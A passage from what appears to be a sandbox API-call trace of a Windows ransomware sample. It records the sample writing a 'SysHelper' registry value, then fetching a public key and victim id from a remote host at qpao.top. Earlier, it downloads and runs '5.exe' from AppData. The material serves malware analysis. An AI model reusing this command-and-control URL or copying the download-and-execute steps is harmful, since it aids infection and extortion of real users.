dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0133.017] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0133.017] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x1200) returned 1 [0133.021] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x1200, lpOverlapped=0x0) returned 1 [0133.021] CloseHandle (hObject=0x6b0) returned 1 [0133.032] InternetCloseHandle (hInternet=0xcc0030) returned 1 [0133.052] InternetCloseHandle (hInternet=0xcc0028) returned 1 [0133.052] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\5.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x635d058 | out: hHeap=0x31d0000) returned 1 [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63898e8 | out: hHeap=0x31d0000) returned 1 [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62bfff0 | out: hHeap=0x31d0000) returned 1 [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f250 | out: hHeap=0x31d0000) returned 1 [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62bfbe8 | out: hHeap=0x31d0000) returned 1 [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e15718 | out: hHeap=0x31d0000) returned 1 [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e15760 | out: hHeap=0x31d0000) returned 1 [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f138 | out: hHeap=0x31d0000) returned 1 [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f288 | out: hHeap=0x31d0000) returned 1 [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f1a8 | out: hHeap=0x31d0000) returned 1 [0133.093] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f2c0 | out: hHeap=0x31d0000) returned 1 [0133.094] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x31fe100 | out: hHeap=0x31d0000) returned 1 [0133.094] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32273f8 | out: hHeap=0x31d0000) returned 1 [0133.094] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62bf820 | out: hHeap=0x31d0000) returned 1 Thread: id = 110 os_tid = 0x1c4 [0124.655] timeGetTime () returned 0x1152d95 [0124.655] GetLastError () returned 0x54f [0124.655] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x3bc) returned 0x62d4090 [0124.656] GetCurrentThreadId () returned 0x1c4 [0124.656] SetLastError (dwErrCode=0x54f) [0124.656] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x12a5a5e4 | out: phkResult=0x12a5a5e4*=0x59c) returned 0x0 [0124.656] RegQueryValueExW (in: hKey=0x59c, lpValueName="SysHelper", lpReserved=0x0, lpType=0x12a5a5d8, lpData=0x12a5a5e0, lpcbData=0x12a5a5dc*=0x4 | out: lpType=0x12a5a5d8*=0x0, lpData=0x12a5a5e0*=0x0, lpcbData=0x12a5a5dc*=0x4) returned 0x2 [0124.656] RegSetValueExW (in: hKey=0x59c, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0x12a5a5e0*=0x1, cbData=0x4 | out: lpData=0x12a5a5e0*=0x1) returned 0x0 [0124.657] RegCloseKey (hKey=0x59c) returned 0x0 [0124.657] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x12a5a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0124.657] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0124.657] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x18) returned 0x5e07db0 [0124.657] AreFileApisANSI () returned 1 [0124.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x12a5a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0124.657] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x7a) returned 0x3231678 [0124.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x12a5a4e4, cbMultiByte=-1, lpWideCharStr=0x3231678, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0124.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12a5a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0124.658] GetLastError () returned 0x2 [0124.658] GetLastError () returned 0x2 [0124.658] SetLastError (dwErrCode=0x2) [0124.658] GetLastError () returned 0x2 [0124.658] SetLastError (dwErrCode=0x2) [0124.658] GetLastError () returned 0x2 [0124.658] SetLastError (dwErrCode=0x2) [0124.658] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x3231678 | out: hHeap=0x31d0000) returned 1 [0124.658] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0124.658] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x50) returned 0x62d03c0 [0124.658] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x76) returned 0x32395d8 [0124.659] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62d03c0 | out: hHeap=0x31d0000) returned 1 [0124.659] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3f4b8 [0124.659] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x62c4908 [0124.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e3f4b8, cbMultiByte=-1, lpWideCharStr=0x62c4908, cchWideChar=1056 | out: lpWideCharStr="8B84840859871A34BC38274344487A39") returned 33 [0124.659] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x850) returned 0x62c5150 [0124.659] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c4908 | out: hHeap=0x31d0000) returned 1 [0124.659] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3f4b8 | out: hHeap=0x31d0000) returned 1 [0124.659] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x8a0) returned 0x62c59a8 [0124.659] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32395d8 | out: hHeap=0x31d0000) returned 1 [0124.659] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c5150 | out: hHeap=0x31d0000) returned 1 [0124.659] lstrcpyW (in: lpString1=0x12a5af78, lpString2="http://qpao.top/nddddhsspen6/get.php?pid=8B84840859871A34BC38274344487A39" | out: lpString1="http://qpao.top/nddddhsspen6/get.php?pid=8B84840859871A34BC38274344487A39") returned="http://qpao.top/nddddhsspen6/get.php?pid=8B84840859871A34BC38274344487A39" [0124.659] lstrcatW (in: lpString1="http://qpao.top/nddddhsspen6/get.php?pid=8B84840859871A34BC38274344487A39", lpString2="&first=true" | out: lpString1="http://qpao.top/nddddhsspen6/get.php?pid=8B84840859871A34BC38274344487A39&first=true") returned="http://qpao.top/nddddhsspen6/get.php?pid=8B84840859871A34BC38274344487A39&first=true" [0124.659] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://qpao.top/nddddhsspen6/get.php?pid=8B84840859871A34BC38274344487A39&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0125.937] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0x12a5a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x12a5a604 | out: lpBuffer=0x12a5a778*, lpdwNumberOfBytesRead=0x12a5a604*=0x22b) returned 1 [0125.938] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x12a5a670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0125.938] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0125.938] AreFileApisANSI () returned 1 [0125.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x12a5a670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0125.938] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x7a) returned 0x32314e0 [0125.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x12a5a670, cbMultiByte=-1, lpWideCharStr=0x32314e0, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0125.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x12a5a47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0125.939] GetFileType (hFile=0x344) returned 0x1 [0125.939] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32314e0 | out: hHeap=0x31d0000) returned 1 [0125.939] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 555 [0125.939] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x1000) returned 0x62c6250 [0125.939] WriteFile (in: hFile=0x344, lpBuffer=0x12a59118*, nNumberOfBytesToWrite=0x22b, lpNumberOfBytesWritten=0x12a58a44, lpOverlapped=0x0 | out: lpBuffer=0x12a59118*, lpNumberOfBytesWritten=0x12a58a44*=0x22b, lpOverlapped=0x0) returned 1 [0125.940] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c6250 | out: hHeap=0x31d0000) returned 1 [0125.940] CloseHandle (hObject=0x344) returned 1 [0125.946] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0125.948] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0125.948] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c59a8 | out: hHeap=0x31d0000) returned 1 [0125.948] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0125.948] lstrcpyA (in: lpString1=0x12a5ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0125.948] lstrcpyA (in: lpString1=0x12a5a778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0125.948] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.948] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.948] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.948] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.949] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.949] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.949] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.949] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.949] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.949] lstrlenA (lpString="-----BEGIN PUBLIC 